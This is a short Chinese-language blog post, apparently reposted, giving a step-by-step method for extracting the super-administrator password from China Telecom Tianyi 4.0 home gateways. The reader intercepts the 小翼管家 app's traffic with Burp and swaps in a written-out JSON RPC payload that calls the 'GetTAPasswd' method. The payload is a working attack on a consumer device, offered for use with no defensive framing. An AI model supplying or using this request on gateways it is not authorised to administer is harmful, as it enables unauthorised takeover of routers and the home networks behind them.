之前讲过天翼3.0的超级管理员密码的破解,利用文件越权漏洞便可以破解,但是4.0的网关该漏洞已经修复。今天来看看如何破解吧!
登录小翼管家APP,先将指示灯关闭。设置代理后,打开指示灯按钮,然后利用burp抓包。修改包数据即可!
打开APP后,点击打开指示灯按钮并抓包。
修改包内容如下:
{
"Params": [],
"MethodName": "GetTAPasswd",
"RPCMethod": "CallMethod",
"ObjectPath": "/com/ctc/igd1/Telecom/System",
"InterfaceName": "com.ctc.igd1.SysCmd",
"ServiceName": "com.ctc.igd1"
}
//player.bilibili.com/player.html?aid=984644141&bvid=BV18t4y1J7Hs&cid=809334954&page=1
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/2119704
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。